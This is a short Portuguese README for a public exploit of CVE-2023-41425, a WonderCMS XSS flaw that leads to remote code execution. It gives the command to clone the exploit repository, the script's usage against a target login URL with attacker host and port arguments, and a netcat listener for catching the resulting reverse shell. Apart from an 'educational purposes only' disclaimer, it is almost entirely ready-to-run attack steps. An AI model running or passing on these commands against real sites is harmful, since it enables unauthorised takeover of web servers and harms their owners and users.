
CVE-2023-41425 - Vulnerabilidade de Cross Site Scripting no Wonder CMS v.3.2.0 até v.3.4.2 permite que um atacante remoto execute código arbitrário por meio de um script malicioso enviado ao componente installModule.
A vulnerabilidade de Cross Site Scripting no Wonder CMS v.3.2.0 até v.3.4.2 permite que um atacante remoto execute código arbitrário por meio de um script especialmente criado enviado ao componente installModule. Apenas para fins educacionais
Requer conhecimento da loginURL, acesso de administrador ou a capacidade de fazer o administrador clicar no link XSS.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

prodigiousMind por descobrir e relatar a vulnerabilidade https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413